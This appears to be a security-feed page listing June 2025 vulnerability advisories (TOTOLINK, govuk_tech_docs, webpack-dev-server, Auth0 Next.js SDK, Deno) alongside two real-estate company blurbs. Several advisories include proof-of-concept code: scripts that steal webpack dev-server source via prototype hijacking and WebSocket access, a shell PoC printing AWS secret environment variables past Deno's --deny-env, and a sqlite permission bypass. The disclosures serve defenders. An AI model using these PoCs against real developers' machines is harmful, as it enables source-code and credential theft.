CVE-2024-22529 |
Description: TOTOLINK X2000R_V2 V2.0.0-B20230727.10434 has a command injection vulnerability in the sub_449040 (handle function of formUploadFile) of /bin/boa.
EPSS Score: 2.64% SSVC Exploitation: none
June 4th, 2025 (4 days ago)
|
CVE-2024-22048 |
Description: govuk_tech_docs versions from 2.0.2 to before 3.3.1 are vulnerable to a cross-site scripting vulnerability. Malicious JavaScript may be executed in the user's browser if a malicious search result is displayed on the search page.
CVSS: MEDIUM (6.1) EPSS Score: 1.18% SSVC Exploitation: none
June 4th, 2025 (4 days ago)
|
Description: [AI generated] "V² Development" is a comprehensive real estate development company that specializes in various aspects of real estate sectors, including residential, commercial, and industrial development. The company prides itself on creating sustainable and innovative solutions to meet the evolving needs of their clients. V² Development focuses on successful property development projects through insightful investment strategies, implying extensive market research and reliable partnership formations.
June 4th, 2025 (4 days ago)
|
Description: As a leader in real estate development in Quebec, Groupe Devimco has been designing and creating unique and mixed-use living environments for 30 years.
Revenue 2024 : $ 44 M
June 4th, 2025 (4 days ago)
|
Description: Summary
Source code may be stolen when you access a malicious web site.
Details
Because a request for a classic script made by a script tag is not subject to the same-origin policy, an attacker can include a script tag for the dev server's script in their own site and run the script. Note that the attacker has to know the port and the output entrypoint script path. Combined with prototype pollution, the attacker can get a reference to the webpack runtime variables.
By using Function::toString against the values in __webpack_modules__, the attacker can get the source code.
PoC
Download reproduction.zip and extract it
Run npm i
Run npx webpack-dev-server
Open https://e29c9a88-a242-4fb4-9e64-b24c9d29b35b.pages.dev/
You can see the source code output in the document and the devtools console.
The script in the POC site is:
let moduleList
const onHandlerSet = (handler) => {
  console.log('h', handler)
  moduleList = handler.require.m
}
const originalArrayForEach = Array.prototype.forEach
Array.prototype.forEach = function forEach(callback, thisArg) {
  callback((handler) => {
    onHandlerSet(handler)
  })
  originalArrayForEach.call(this, callback, thisArg)
  Array.prototype.forEach = originalArrayForEach
}
const script = document.createElement('script')
script.src = 'http://localhost:8080/main.js'
script.addEventListener('load', () => {
  console.log(moduleList)
  for (const key in moduleList) {
    const p = document.createElement('p')
    const title = document.createElement('strong')
    title.textContent = key
    const ...
CVSS: MEDIUM (5.3) EPSS Score: 0.03%
June 4th, 2025 (4 days ago)
|
Description: Summary
Source code may be stolen when you access a malicious web site with a non-Chromium-based browser.
Details
The Origin header is checked to prevent Cross-site WebSocket hijacking from happening which was reported by CVE-2018-14732.
But webpack-dev-server always allows IP address Origin headers.
https://github.com/webpack/webpack-dev-server/blob/55220a800ba4e30dbde2d98785ecf4c80b32f711/lib/Server.js#L3113-L3127
This allows websites that are served on IP addresses to connect to the WebSocket.
By using the same method described in the article linked from CVE-2018-14732, the attacker can get the source code.
Related commit: https://github.com/webpack/webpack-dev-server/commit/72efaab83381a0e1c4914adf401cbd210b7de7eb (note that the checkHost function was only used for the Host header to prevent DNS rebinding attacks, so this change itself is fine).
This vulnerability does not affect Chrome 94+ (and other Chromium based browsers) users due to the non-HTTPS private access blocking feature.
PoC
Download reproduction.zip and extract it
Run npm i
Run npx webpack-dev-server
Open http://{ipaddress}/?target=http://localhost:8080&file=main with a non-Chromium browser (I used Firefox 134.0.1)
Edit src/index.js in the extracted directory
You can see the content of src/index.js
The script in the POC site is:
window.webpackHotUpdate = (...args) => {
  console.log(...args);
  for (i in args[1]) {
    document.body.innerText = args[1][i].toString() + document.body.innerText
    console.log(args...
CVSS: HIGH (7.5)
June 4th, 2025 (4 days ago)
|
Description: Overview
In Auth0 Next.js SDK versions 4.0.1 to 4.6.0, __session cookies set by auth0.middleware may be cached by CDNs due to missing Cache-Control headers.
Am I Affected?
You are affected by this vulnerability if you meet the following preconditions:
Applications using the NextJS-Auth0 SDK, versions from 4.0.1 to 4.6.0,
Applications using CDN or edge caching that caches responses with the Set-Cookie header.
If the Cache-Control header is not properly set for sensitive responses.
Fix
Upgrade auth0/nextjs-auth0 to v4.6.1.
References
https://github.com/auth0/nextjs-auth0/security/advisories/GHSA-f3fg-mf2q-fj3f
https://github.com/auth0/nextjs-auth0/commit/12a62ca596db3b0827b39a4b865b882423e7cb1e
https://github.com/advisories/GHSA-f3fg-mf2q-fj3f
June 4th, 2025 (4 days ago)
|
Description: Summary
The Deno.env.toObject method ignores any variables listed in the --deny-env option of the deno run command. When looking at the documentation of the --deny-env option this might lead to a false impression that variables listed in the option are impossible to read.
PoC
export AWS_SECRET_ACCESS_KEY=my-secret-aws-key
# Works as expected. The program stops with a "NotCapable" error message
echo 'console.log(Deno.env.get("AWS_SECRET_ACCESS_KEY"));' | deno run \
  --allow-env \
  --deny-env=AWS_ACCESS_KEY_ID,AWS_SECRET_ACCESS_KEY -
# All environment variables are printed and the --deny-env list is completely disregarded
echo 'console.log(Deno.env.toObject());' | deno run \
  --allow-env \
  --deny-env=AWS_ACCESS_KEY_ID,AWS_SECRET_ACCESS_KEY -
The first example using get exits with the following error:
error: Uncaught (in promise) NotCapable: Requires env access to "AWS_SECRET_ACCESS_KEY", run again with the --allow-env flag
console.log(Deno.env.get("AWS_SECRET_ACCESS_KEY"));
^
at Object.getEnv [as get] (ext:deno_os/30_os.js:124:10)
at file:///$deno$stdin.mts:1:22
The second example using toObject prints all environment variables:
[Object: null prototype] {
...
AWS_SECRET_ACCESS_KEY: "my-secret-aws-key",
...
}
Impact
Software relying on the combination of both flags to allow access to most environment variables except a few sensitive ones will be vulnerable to malicious code trying to steal secrets using the Deno.env.toObject() meth...
June 4th, 2025 (4 days ago)
|
Description: Summary
It is possible to bypass Deno's read/write permission checks by using the ATTACH DATABASE statement.
PoC
// poc.js
import { DatabaseSync } from "node:sqlite"
const db = new DatabaseSync(":memory:");
db.exec("ATTACH DATABASE 'test.db' as test;");
db.exec("CREATE TABLE test.test (id INTEGER PRIMARY KEY, name TEXT);");
$ deno poc.js
References
https://github.com/denoland/deno/security/advisories/GHSA-8vxj-4cph-c596
https://github.com/denoland/deno/commit/31a97803995bd94629528ba841b2418d3ca01860
https://github.com/advisories/GHSA-8vxj-4cph-c596
June 4th, 2025 (4 days ago)
|